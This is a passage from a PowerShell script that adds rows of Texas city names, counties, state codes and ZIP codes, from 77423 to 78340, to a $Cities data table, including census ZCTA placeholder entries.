$Cities.Rows.Add("Brookshire","Waller","Texas","TX","48","77423") + $null = $Cities.Rows.Add("Chappell hill","Washington","Texas","TX","48","77426") + $null = $Cities.Rows.Add("Collegeport","Matagorda","Texas","TX","48","77428") + $null = $Cities.Rows.Add("Cypress","Harris","Texas","TX","48","77429") + $null = $Cities.Rows.Add("Damon","Brazoria","Texas","TX","48","77430") + $null = $Cities.Rows.Add("Danevang","Wharton","Texas","TX","48","77432") + $null = $Cities.Rows.Add("Cypress","Harris","Texas","TX","48","77433") + $null = $Cities.Rows.Add("Eagle lake","Colorado","Texas","TX","48","77434") + $null = $Cities.Rows.Add("East bernard","Wharton","Texas","TX","48","77435") + $null = $Cities.Rows.Add("El campo","Wharton","Texas","TX","48","77437") + $null = $Cities.Rows.Add("Elmaton","Matagorda","Texas","TX","48","77440") + $null = $Cities.Rows.Add("Fulshear","Fort Bend","Texas","TX","48","77441") + $null = $Cities.Rows.Add("Garwood","Colorado","Texas","TX","48","77442") + $null = $Cities.Rows.Add("Glen flora","Wharton","Texas","TX","48","77443") + $null = $Cities.Rows.Add("Guy","Fort Bend","Texas","TX","48","77444") + $null = $Cities.Rows.Add("Hempstead","Waller","Texas","TX","48","77445") + $null = $Cities.Rows.Add("Prairie view","Waller","Texas","TX","48","77446") + $null = $Cities.Rows.Add("Hockley","Harris","Texas","TX","48","77447") + $null = $Cities.Rows.Add("Hungerford","Wharton","Texas","TX","48","77448") + $null = $Cities.Rows.Add("Park row","Harris","Texas","TX","48","77449") + $null = $Cities.Rows.Add("Park row","Harris","Texas","TX","48","77450") + $null = $Cities.Rows.Add("Kendleton","Fort Bend","Texas","TX","48","77451") + $null = $Cities.Rows.Add("Lissie","Wharton","Texas","TX","48","77454") + $null = $Cities.Rows.Add("Louise","Wharton","Texas","TX","48","77455") + $null = $Cities.Rows.Add("Markham","Matagorda","Texas","TX","48","77456") + $null = $Cities.Rows.Add("Matagorda","Matagorda","Texas","TX","48","77457") + $null = $Cities.Rows.Add("Midfield","Matagorda","Texas","TX","48","77458") + $null = $Cities.Rows.Add("Missouri city","Fort Bend","Texas","TX","48","77459") + $null = $Cities.Rows.Add("Needville","Fort Bend","Texas","TX","48","77461") + $null = $Cities.Rows.Add("Old ocean","Brazoria","Texas","TX","48","77463") + $null = $Cities.Rows.Add("Orchard","Fort Bend","Texas","TX","48","77464") + $null = $Cities.Rows.Add("Palacios","Matagorda","Texas","TX","48","77465") + $null = $Cities.Rows.Add("Pattison","Waller","Texas","TX","48","77466") + $null = $Cities.Rows.Add("Pierce","Wharton","Texas","TX","48","77467") + $null = $Cities.Rows.Add("Pledger","Matagorda","Texas","TX","48","77468") + $null = $Cities.Rows.Add("Clodine","Fort Bend","Texas","TX","48","77469") + $null = $Cities.Rows.Add("Rock island","Colorado","Texas","TX","48","77470") + $null = $Cities.Rows.Add("Rosenberg","Fort Bend","Texas","TX","48","77471") + $null = $Cities.Rows.Add("San felipe","Austin","Texas","TX","48","77473") + $null = $Cities.Rows.Add("Sealy","Austin","Texas","TX","48","77474") + $null = $Cities.Rows.Add("Sheridan","Colorado","Texas","TX","48","77475") + $null = $Cities.Rows.Add("Simonton","Fort Bend","Texas","TX","48","77476") + $null = $Cities.Rows.Add("Stafford","Fort Bend","Texas","TX","48","77477") + $null = $Cities.Rows.Add("Sugar land","Fort Bend","Texas","TX","48","77478") + $null = $Cities.Rows.Add("Sugar land","Fort Bend","Texas","TX","48","77479") + $null = $Cities.Rows.Add("Sweeny","Brazoria","Texas","TX","48","77480") + $null = $Cities.Rows.Add("Thompsons","Fort Bend","Texas","TX","48","77481") + $null = $Cities.Rows.Add("Van vleck","Matagorda","Texas","TX","48","77482") + $null = $Cities.Rows.Add("Wadsworth","Matagorda","Texas","TX","48","77483") + $null = $Cities.Rows.Add("Waller","Waller","Texas","TX","48","77484") + $null = $Cities.Rows.Add("Wallis","Austin","Texas","TX","48","77485") + $null = $Cities.Rows.Add("West columbia","Brazoria","Texas","TX","48","77486") + $null = $Cities.Rows.Add("Wharton","Wharton","Texas","TX","48","77488") + $null = $Cities.Rows.Add("Missouri city","Fort Bend","Texas","TX","48","77489") + $null = $Cities.Rows.Add("Park row","Harris","Texas","TX","48","77493") + $null = $Cities.Rows.Add("Park row","Fort Bend","Texas","TX","48","77494") + $null = $Cities.Rows.Add("Zcta 774hh","Brazoria","Texas","TX","48","774HH") + $null = $Cities.Rows.Add("Zcta 774xx","Matagorda","Texas","TX","48","774XX") + $null = $Cities.Rows.Add("Pasadena","Harris","Texas","TX","48","77502") + $null = $Cities.Rows.Add("Pasadena","Harris","Texas","TX","48","77503") + $null = $Cities.Rows.Add("Pasadena","Harris","Texas","TX","48","77504") + $null = $Cities.Rows.Add("Pasadena","Harris","Texas","TX","48","77505") + $null = $Cities.Rows.Add("Pasadena","Harris","Texas","TX","48","77506") + $null = $Cities.Rows.Add("Pasadena","Harris","Texas","TX","48","77507") + $null = $Cities.Rows.Add("Alta loma","Galveston","Texas","TX","48","77510") + $null = $Cities.Rows.Add("Alvin","Brazoria","Texas","TX","48","77511") + $null = $Cities.Rows.Add("Monroe city","Chambers","Texas","TX","48","77514") + $null = $Cities.Rows.Add("Angleton","Brazoria","Texas","TX","48","77515") + $null = $Cities.Rows.Add("Arcadia","Galveston","Texas","TX","48","77517") + $null = $Cities.Rows.Add("Bacliff","Galveston","Texas","TX","48","77518") + $null = $Cities.Rows.Add("Batson","Hardin","Texas","TX","48","77519") + $null = $Cities.Rows.Add("Baytown","Harris","Texas","TX","48","77520") + $null = $Cities.Rows.Add("Baytown","Harris","Texas","TX","48","77521") + $null = $Cities.Rows.Add("Channelview","Harris","Texas","TX","48","77530") + $null = $Cities.Rows.Add("Clute","Brazoria","Texas","TX","48","77531") + $null = $Cities.Rows.Add("Barrett","Harris","Texas","TX","48","77532") + $null = $Cities.Rows.Add("Daisetta","Liberty","Texas","TX","48","77533") + $null = $Cities.Rows.Add("Danbury","Brazoria","Texas","TX","48","77534") + $null = $Cities.Rows.Add("Dayton","Liberty","Texas","TX","48","77535") + $null = $Cities.Rows.Add("Deer park","Harris","Texas","TX","48","77536") + $null = $Cities.Rows.Add("Devers","Liberty","Texas","TX","48","77538") + $null = $Cities.Rows.Add("San leon","Galveston","Texas","TX","48","77539") + $null = $Cities.Rows.Add("Quintana","Brazoria","Texas","TX","48","77541") + $null = $Cities.Rows.Add("Fresno","Fort Bend","Texas","TX","48","77545") + $null = $Cities.Rows.Add("Friendswood","Galveston","Texas","TX","48","77546") + $null = $Cities.Rows.Add("Galena park","Harris","Texas","TX","48","77547") + $null = $Cities.Rows.Add("Galveston","Galveston","Texas","TX","48","77550") + $null = $Cities.Rows.Add("Galveston","Galveston","Texas","TX","48","77551") + $null = $Cities.Rows.Add("Galveston","Galveston","Texas","TX","48","77553") + $null = $Cities.Rows.Add("Galveston","Galveston","Texas","TX","48","77554") + $null = $Cities.Rows.Add("Hankamer","Chambers","Texas","TX","48","77560") + $null = $Cities.Rows.Add("Hardin","Liberty","Texas","TX","48","77561") + $null = $Cities.Rows.Add("Highlands","Harris","Texas","TX","48","77562") + $null = $Cities.Rows.Add("Hitchcock","Galveston","Texas","TX","48","77563") + $null = $Cities.Rows.Add("Hull","Liberty","Texas","TX","48","77564") + $null = $Cities.Rows.Add("Clear lake shore","Galveston","Texas","TX","48","77565") + $null = $Cities.Rows.Add("Lake jackson","Brazoria","Texas","TX","48","77566") + $null = $Cities.Rows.Add("La marque","Galveston","Texas","TX","48","77568") + $null = $Cities.Rows.Add("Shoreacres","Harris","Texas","TX","48","77571") + $null = $Cities.Rows.Add("League city","Galveston","Texas","TX","48","77573") + $null = $Cities.Rows.Add("Ames","Liberty","Texas","TX","48","77575") + $null = $Cities.Rows.Add("Liverpool","Brazoria","Texas","TX","48","77577") + $null = $Cities.Rows.Add("Manvel","Brazoria","Texas","TX","48","77578") + $null = $Cities.Rows.Add("Pearland","Brazoria","Texas","TX","48","77581") + $null = $Cities.Rows.Add("Raywood","Liberty","Texas","TX","48","77582") + $null = $Cities.Rows.Add("Rosharon","Brazoria","Texas","TX","48","77583") + $null = $Cities.Rows.Add("Pearland","Brazoria","Texas","TX","48","77584") + $null = $Cities.Rows.Add("Saratoga","Hardin","Texas","TX","48","77585") + $null = $Cities.Rows.Add("El lago","Harris","Texas","TX","48","77586") + $null = $Cities.Rows.Add("South houston","Harris","Texas","TX","48","77587") + $null = $Cities.Rows.Add("Texas city","Galveston","Texas","TX","48","77590") + $null = $Cities.Rows.Add("Texas city","Galveston","Texas","TX","48","77591") + $null = $Cities.Rows.Add("Wallisville","Chambers","Texas","TX","48","77597") + $null = $Cities.Rows.Add("Webster","Harris","Texas","TX","48","77598") + $null = $Cities.Rows.Add("Zcta 775hh","Brazoria","Texas","TX","48","775HH") + $null = $Cities.Rows.Add("Zcta 775xx","Chambers","Texas","TX","48","775XX") + $null = $Cities.Rows.Add("Bridge city","Orange","Texas","TX","48","77611") + $null = $Cities.Rows.Add("Buna","Jasper","Texas","TX","48","77612") + $null = $Cities.Rows.Add("China","Jefferson","Texas","TX","48","77613") + $null = $Cities.Rows.Add("Deweyville","Newton","Texas","TX","48","77614") + $null = $Cities.Rows.Add("Evadale","Jasper","Texas","TX","48","77615") + $null = $Cities.Rows.Add("Fred","Tyler","Texas","TX","48","77616") + $null = $Cities.Rows.Add("Gilchrist","Galveston","Texas","TX","48","77617") + $null = $Cities.Rows.Add("Groves","Jefferson","Texas","TX","48","77619") + $null = $Cities.Rows.Add("Hamshire","Jefferson","Texas","TX","48","77622") + $null = $Cities.Rows.Add("High island","Galveston","Texas","TX","48","77623") + $null = $Cities.Rows.Add("Hillister","Tyler","Texas","TX","48","77624") + $null = $Cities.Rows.Add("Kountze","Hardin","Texas","TX","48","77625") + $null = $Cities.Rows.Add("Nederland","Jefferson","Texas","TX","48","77627") + $null = $Cities.Rows.Add("Nome","Jefferson","Texas","TX","48","77629") + $null = $Cities.Rows.Add("West orange","Orange","Texas","TX","48","77630") + $null = $Cities.Rows.Add("Orange","Orange","Texas","TX","48","77632") + $null = $Cities.Rows.Add("Port acres","Jefferson","Texas","TX","48","77640") + $null = $Cities.Rows.Add("Port arthur","Jefferson","Texas","TX","48","77642") + $null = $Cities.Rows.Add("Crystal beach","Galveston","Texas","TX","48","77650") + $null = $Cities.Rows.Add("Port neches","Jefferson","Texas","TX","48","77651") + $null = $Cities.Rows.Add("Sabine pass","Jefferson","Texas","TX","48","77655") + $null = $Cities.Rows.Add("Silsbee","Hardin","Texas","TX","48","77656") + $null = $Cities.Rows.Add("Zcta 77657","Hardin","Texas","TX","48","77657") + $null = $Cities.Rows.Add("Sour lake","Hardin","Texas","TX","48","77659") + $null = $Cities.Rows.Add("Spurger","Tyler","Texas","TX","48","77660") + $null = $Cities.Rows.Add("Vidor","Orange","Texas","TX","48","77662") + $null = $Cities.Rows.Add("Village mills","Hardin","Texas","TX","48","77663") + $null = $Cities.Rows.Add("Warren","Tyler","Texas","TX","48","77664") + $null = $Cities.Rows.Add("Winnie","Chambers","Texas","TX","48","77665") + $null = $Cities.Rows.Add("Zcta 776hh","Chambers","Texas","TX","48","776HH") + $null = $Cities.Rows.Add("Zcta 776xx","Chambers","Texas","TX","48","776XX") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77701") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77702") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77703") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77705") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77706") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77707") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77708") + $null = $Cities.Rows.Add("Beaumont","Jefferson","Texas","TX","48","77713") + $null = $Cities.Rows.Add("Zcta 777hh","Jefferson","Texas","TX","48","777HH") + $null = $Cities.Rows.Add("Zcta 777xx","Jefferson","Texas","TX","48","777XX") + $null = $Cities.Rows.Add("Bryan","Brazos","Texas","TX","48","77801") + $null = $Cities.Rows.Add("Bryan","Brazos","Texas","TX","48","77802") + $null = $Cities.Rows.Add("Bryan","Brazos","Texas","TX","48","77803") + $null = $Cities.Rows.Add("Bryan","Brazos","Texas","TX","48","77807") + $null = $Cities.Rows.Add("Bryan","Brazos","Texas","TX","48","77808") + $null = $Cities.Rows.Add("Anderson","Grimes","Texas","TX","48","77830") + $null = $Cities.Rows.Add("Singleton","Grimes","Texas","TX","48","77831") + $null = $Cities.Rows.Add("Brenham","Washington","Texas","TX","48","77833") + $null = $Cities.Rows.Add("Burton","Washington","Texas","TX","48","77835") + $null = $Cities.Rows.Add("Caldwell","Burleson","Texas","TX","48","77836") + $null = $Cities.Rows.Add("Calvert","Robertson","Texas","TX","48","77837") + $null = $Cities.Rows.Add("College station","Brazos","Texas","TX","48","77840") + $null = $Cities.Rows.Add("College station","Brazos","Texas","TX","48","77845") + $null = $Cities.Rows.Add("Dime box","Lee","Texas","TX","48","77853") + $null = $Cities.Rows.Add("Flynn","Leon","Texas","TX","48","77855") + $null = $Cities.Rows.Add("Franklin","Robertson","Texas","TX","48","77856") + $null = $Cities.Rows.Add("Gause","Milam","Texas","TX","48","77857") + $null = $Cities.Rows.Add("Hearne","Robertson","Texas","TX","48","77859") + $null = $Cities.Rows.Add("Iola","Grimes","Texas","TX","48","77861") + $null = $Cities.Rows.Add("Madisonville","Madison","Texas","TX","48","77864") + $null = $Cities.Rows.Add("Marquez","Leon","Texas","TX","48","77865") + $null = $Cities.Rows.Add("Millican","Brazos","Texas","TX","48","77866") + $null = $Cities.Rows.Add("Mumford","Robertson","Texas","TX","48","77867") + $null = $Cities.Rows.Add("Navasota","Grimes","Texas","TX","48","77868") + $null = $Cities.Rows.Add("New baden","Robertson","Texas","TX","48","77870") + $null = $Cities.Rows.Add("Hilltop lakes","Leon","Texas","TX","48","77871") + $null = $Cities.Rows.Add("North zulch","Madison","Texas","TX","48","77872") + $null = $Cities.Rows.Add("Richards","Grimes","Texas","TX","48","77873") + $null = $Cities.Rows.Add("Shiro","Walker","Texas","TX","48","77876") + $null = $Cities.Rows.Add("Snook","Burleson","Texas","TX","48","77878") + $null = $Cities.Rows.Add("Somerville","Burleson","Texas","TX","48","77879") + $null = $Cities.Rows.Add("Washington","Washington","Texas","TX","48","77880") + $null = $Cities.Rows.Add("Wheelock","Robertson","Texas","TX","48","77882") + $null = $Cities.Rows.Add("Zcta 778hh","Brazos","Texas","TX","48","778HH") + $null = $Cities.Rows.Add("Victoria","Victoria","Texas","TX","48","77901") + $null = $Cities.Rows.Add("Victoria","Victoria","Texas","TX","48","77904") + $null = $Cities.Rows.Add("Victoria","Victoria","Texas","TX","48","77905") + $null = $Cities.Rows.Add("Austwell","Refugio","Texas","TX","48","77950") + $null = $Cities.Rows.Add("Bloomington","Victoria","Texas","TX","48","77951") + $null = $Cities.Rows.Add("Cuero","DeWitt","Texas","TX","48","77954") + $null = $Cities.Rows.Add("Edna","Jackson","Texas","TX","48","77957") + $null = $Cities.Rows.Add("Fannin","Goliad","Texas","TX","48","77960") + $null = $Cities.Rows.Add("Francitas","Jackson","Texas","TX","48","77961") + $null = $Cities.Rows.Add("Ganado","Jackson","Texas","TX","48","77962") + $null = $Cities.Rows.Add("Goliad","Goliad","Texas","TX","48","77963") + $null = $Cities.Rows.Add("Hallettsville","Lavaca","Texas","TX","48","77964") + $null = $Cities.Rows.Add("Inez","Victoria","Texas","TX","48","77968") + $null = $Cities.Rows.Add("La salle","Jackson","Texas","TX","48","77969") + $null = $Cities.Rows.Add("La ward","Jackson","Texas","TX","48","77970") + $null = $Cities.Rows.Add("Lolita","Jackson","Texas","TX","48","77971") + $null = $Cities.Rows.Add("Mcfaddin","Victoria","Texas","TX","48","77973") + $null = $Cities.Rows.Add("Meyersville","DeWitt","Texas","TX","48","77974") + $null = $Cities.Rows.Add("Moulton","Lavaca","Texas","TX","48","77975") + $null = $Cities.Rows.Add("Placedo","Victoria","Texas","TX","48","77977") + $null = $Cities.Rows.Add("Point comfort","Calhoun","Texas","TX","48","77978") + $null = $Cities.Rows.Add("Port lavaca","Calhoun","Texas","TX","48","77979") + $null = $Cities.Rows.Add("Port o connor","Calhoun","Texas","TX","48","77982") + $null = $Cities.Rows.Add("Seadrift","Calhoun","Texas","TX","48","77983") + $null = $Cities.Rows.Add("Shiner","Lavaca","Texas","TX","48","77984") + $null = $Cities.Rows.Add("Telferner","Victoria","Texas","TX","48","77988") + $null = $Cities.Rows.Add("Tivoli","Refugio","Texas","TX","48","77990") + $null = $Cities.Rows.Add("Vanderbilt","Jackson","Texas","TX","48","77991") + $null = $Cities.Rows.Add("Westhoff","DeWitt","Texas","TX","48","77994") + $null = $Cities.Rows.Add("Yoakum","Lavaca","Texas","TX","48","77995") + $null = $Cities.Rows.Add("Zcta 779hh","Calhoun","Texas","TX","48","779HH") + $null = $Cities.Rows.Add("Zcta 779xx","Calhoun","Texas","TX","48","779XX") + $null = $Cities.Rows.Add("Artesia wells","La Salle","Texas","TX","48","78001") + $null = $Cities.Rows.Add("Atascosa","Bexar","Texas","TX","48","78002") + $null = $Cities.Rows.Add("Bandera","Bandera","Texas","TX","48","78003") + $null = $Cities.Rows.Add("Bergheim","Kendall","Texas","TX","48","78004") + $null = $Cities.Rows.Add("Bigfoot","Frio","Texas","TX","48","78005") + $null = $Cities.Rows.Add("Sisterdale","Kendall","Texas","TX","48","78006") + $null = $Cities.Rows.Add("Calliham","McMullen","Texas","TX","48","78007") + $null = $Cities.Rows.Add("Campbellton","Atascosa","Texas","TX","48","78008") + $null = $Cities.Rows.Add("Castroville","Medina","Texas","TX","48","78009") + $null = $Cities.Rows.Add("Camp verde","Kerr","Texas","TX","48","78010") + $null = $Cities.Rows.Add("Charlotte","Atascosa","Texas","TX","48","78011") + $null = $Cities.Rows.Add("Christine","Atascosa","Texas","TX","48","78012") + $null = $Cities.Rows.Add("Comfort","Kendall","Texas","TX","48","78013") + $null = $Cities.Rows.Add("Cotulla","La Salle","Texas","TX","48","78014") + $null = $Cities.Rows.Add("Zcta 78015","Bexar","Texas","TX","48","78015") + $null = $Cities.Rows.Add("Devine","Medina","Texas","TX","48","78016") + $null = $Cities.Rows.Add("Dilley","Frio","Texas","TX","48","78017") + $null = $Cities.Rows.Add("Encinal","La Salle","Texas","TX","48","78019") + $null = $Cities.Rows.Add("Fowlerton","La Salle","Texas","TX","48","78021") + $null = $Cities.Rows.Add("George west","Live Oak","Texas","TX","48","78022") + $null = $Cities.Rows.Add("Grey forest","Bexar","Texas","TX","48","78023") + $null = $Cities.Rows.Add("Hunt","Kerr","Texas","TX","48","78024") + $null = $Cities.Rows.Add("Ingram","Kerr","Texas","TX","48","78025") + $null = $Cities.Rows.Add("Jourdanton","Atascosa","Texas","TX","48","78026") + $null = $Cities.Rows.Add("Kendalia","Kendall","Texas","TX","48","78027") + $null = $Cities.Rows.Add("Kerrville","Kerr","Texas","TX","48","78028") + $null = $Cities.Rows.Add("La coste","Medina","Texas","TX","48","78039") + $null = $Cities.Rows.Add("Laredo","Webb","Texas","TX","48","78040") + $null = $Cities.Rows.Add("Laredo","Webb","Texas","TX","48","78041") + $null = $Cities.Rows.Add("Rio bravo","Webb","Texas","TX","48","78043") + $null = $Cities.Rows.Add("Zcta 78045","Webb","Texas","TX","48","78045") + $null = $Cities.Rows.Add("Zcta 78046","Webb","Texas","TX","48","78046") + $null = $Cities.Rows.Add("Leming","Atascosa","Texas","TX","48","78050") + $null = $Cities.Rows.Add("Lytle","Atascosa","Texas","TX","48","78052") + $null = $Cities.Rows.Add("Mc coy","Atascosa","Texas","TX","48","78053") + $null = $Cities.Rows.Add("Medina","Bandera","Texas","TX","48","78055") + $null = $Cities.Rows.Add("Mico","Medina","Texas","TX","48","78056") + $null = $Cities.Rows.Add("Moore","Frio","Texas","TX","48","78057") + $null = $Cities.Rows.Add("Mountain home","Kerr","Texas","TX","48","78058") + $null = $Cities.Rows.Add("Natalia","Medina","Texas","TX","48","78059") + $null = $Cities.Rows.Add("Pearsall","Frio","Texas","TX","48","78061") + $null = $Cities.Rows.Add("Lakehills","Bandera","Texas","TX","48","78063") + $null = $Cities.Rows.Add("Pleasanton","Atascosa","Texas","TX","48","78064") + $null = $Cities.Rows.Add("Poteet","Atascosa","Texas","TX","48","78065") + $null = $Cities.Rows.Add("Riomedina","Medina","Texas","TX","48","78066") + $null = $Cities.Rows.Add("San ygnacio","Zapata","Texas","TX","48","78067") + $null = $Cities.Rows.Add("Somerset","Atascosa","Texas","TX","48","78069") + $null = $Cities.Rows.Add("Spring branch","Comal","Texas","TX","48","78070") + $null = $Cities.Rows.Add("Three rivers","Live Oak","Texas","TX","48","78071") + $null = $Cities.Rows.Add("Tilden","McMullen","Texas","TX","48","78072") + $null = $Cities.Rows.Add("Von ormy","Bexar","Texas","TX","48","78073") + $null = $Cities.Rows.Add("Waring","Kendall","Texas","TX","48","78074") + $null = $Cities.Rows.Add("Whitsett","Live Oak","Texas","TX","48","78075") + $null = $Cities.Rows.Add("Zapata","Zapata","Texas","TX","48","78076") + $null = $Cities.Rows.Add("Zcta 780hh","Bandera","Texas","TX","48","780HH") + $null = $Cities.Rows.Add("Zcta 780xx","Webb","Texas","TX","48","780XX") + $null = $Cities.Rows.Add("Adkins","Bexar","Texas","TX","48","78101") + $null = $Cities.Rows.Add("Beeville","Bee","Texas","TX","48","78102") + $null = $Cities.Rows.Add("Berclair","Goliad","Texas","TX","48","78107") + $null = $Cities.Rows.Add("Cibolo","Guadalupe","Texas","TX","48","78108") + $null = $Cities.Rows.Add("Converse","Bexar","Texas","TX","48","78109") + $null = $Cities.Rows.Add("Elmendorf","Bexar","Texas","TX","48","78112") + $null = $Cities.Rows.Add("Falls city","Karnes","Texas","TX","48","78113") + $null = $Cities.Rows.Add("Floresville","Wilson","Texas","TX","48","78114") + $null = $Cities.Rows.Add("Gillett","Karnes","Texas","TX","48","78116") + $null = $Cities.Rows.Add("Hobson","Karnes","Texas","TX","48","78117") + $null = $Cities.Rows.Add("Karnes city","Karnes","Texas","TX","48","78118") + $null = $Cities.Rows.Add("Kenedy","Karnes","Texas","TX","48","78119") + $null = $Cities.Rows.Add("La vernia","Wilson","Texas","TX","48","78121") + $null = $Cities.Rows.Add("Leesville","Gonzales","Texas","TX","48","78122") + $null = $Cities.Rows.Add("Mc queeney","Guadalupe","Texas","TX","48","78123") + $null = $Cities.Rows.Add("Marion","Guadalupe","Texas","TX","48","78124") + $null = $Cities.Rows.Add("Mineral","Bee","Texas","TX","48","78125") + $null = $Cities.Rows.Add("Canyon lake","Comal","Texas","TX","48","78130") + $null = $Cities.Rows.Add("Canyon lake","Comal","Texas","TX","48","78132") + $null = $Cities.Rows.Add("Canyon lake","Comal","Texas","TX","48","78133") + $null = $Cities.Rows.Add("Nixon","Gonzales","Texas","TX","48","78140") + $null = $Cities.Rows.Add("Nordheim","DeWitt","Texas","TX","48","78141") + $null = $Cities.Rows.Add("Normanna","Bee","Texas","TX","48","78142") + $null = $Cities.Rows.Add("Pandora","Wilson","Texas","TX","48","78143") + $null = $Cities.Rows.Add("Panna maria","Karnes","Texas","TX","48","78144") + $null = $Cities.Rows.Add("Pawnee","Bee","Texas","TX","48","78145") + $null = $Cities.Rows.Add("Pettus","Bee","Texas","TX","48","78146") + $null = $Cities.Rows.Add("Poth","Wilson","Texas","TX","48","78147") + $null = $Cities.Rows.Add("Randolph a f b","Bexar","Texas","TX","48","78148") + $null = $Cities.Rows.Add("Runge","Karnes","Texas","TX","48","78151") + $null = $Cities.Rows.Add("Saint hedwig","Bexar","Texas","TX","48","78152") + $null = $Cities.Rows.Add("Selma","Guadalupe","Texas","TX","48","78154") + $null = $Cities.Rows.Add("Seguin","Guadalupe","Texas","TX","48","78155") + $null = $Cities.Rows.Add("Smiley","Gonzales","Texas","TX","48","78159") + $null = $Cities.Rows.Add("Stockdale","Wilson","Texas","TX","48","78160") + $null = $Cities.Rows.Add("Sutherland sprin","Wilson","Texas","TX","48","78161") + $null = $Cities.Rows.Add("Wetmore","Comal","Texas","TX","48","78163") + $null = $Cities.Rows.Add("Yorktown","DeWitt","Texas","TX","48","78164") + $null = $Cities.Rows.Add("Zcta 781hh","Comal","Texas","TX","48","781HH") + $null = $Cities.Rows.Add("Zcta 781xx","Bee","Texas","TX","48","781XX") + $null = $Cities.Rows.Add("Balcones heights","Bexar","Texas","TX","48","78201") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78202") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78203") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78204") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78205") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78207") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78208") + $null = $Cities.Rows.Add("Alamo heights","Bexar","Texas","TX","48","78209") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78210") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78211") + $null = $Cities.Rows.Add("Olmos park","Bexar","Texas","TX","48","78212") + $null = $Cities.Rows.Add("Castle hills","Bexar","Texas","TX","48","78213") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78214") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78215") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78216") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78217") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78218") + $null = $Cities.Rows.Add("Kirby","Bexar","Texas","TX","48","78219") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78220") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78221") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78222") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78223") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78224") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78225") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78226") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78227") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78228") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78229") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78230") + $null = $Cities.Rows.Add("Shavano park","Bexar","Texas","TX","48","78231") + $null = $Cities.Rows.Add("Hollywood park","Bexar","Texas","TX","48","78232") + $null = $Cities.Rows.Add("Live oak","Bexar","Texas","TX","48","78233") + $null = $Cities.Rows.Add("Fort sam houston","Bexar","Texas","TX","48","78234") + $null = $Cities.Rows.Add("Brooks a f b","Bexar","Texas","TX","48","78235") + $null = $Cities.Rows.Add("Wilford hall u s","Bexar","Texas","TX","48","78236") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78237") + $null = $Cities.Rows.Add("Leon valley","Bexar","Texas","TX","48","78238") + $null = $Cities.Rows.Add("Windcrest","Bexar","Texas","TX","48","78239") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78240") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78242") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78244") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78245") + $null = $Cities.Rows.Add("Wetmore","Bexar","Texas","TX","48","78247") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78248") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78249") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78250") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78251") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78252") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78253") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78254") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78255") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78256") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78257") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78258") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78259") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78260") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78261") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78263") + $null = $Cities.Rows.Add("San antonio","Bexar","Texas","TX","48","78264") + $null = $Cities.Rows.Add("Garden ridge","Comal","Texas","TX","48","78266") + $null = $Cities.Rows.Add("Zcta 782hh","Bexar","Texas","TX","48","782HH") + $null = $Cities.Rows.Add("Zcta 782xx","Bexar","Texas","TX","48","782XX") + $null = $Cities.Rows.Add("Agua dulce","Nueces","Texas","TX","48","78330") + $null = $Cities.Rows.Add("Alice","Jim Wells","Texas","TX","48","78332") + $null = $Cities.Rows.Add("Aransas pass","San Patricio","Texas","TX","48","78336") + $null = $Cities.Rows.Add("Armstrong","Kenedy","Texas","TX","48","78338") + $null = $Cities.Rows.Add("Banquete","Nueces","Texas","TX","48","78339") + $null = $Cities.Rows.Add("Bayside","Refugio","Texas","TX","48","78340") + $null = 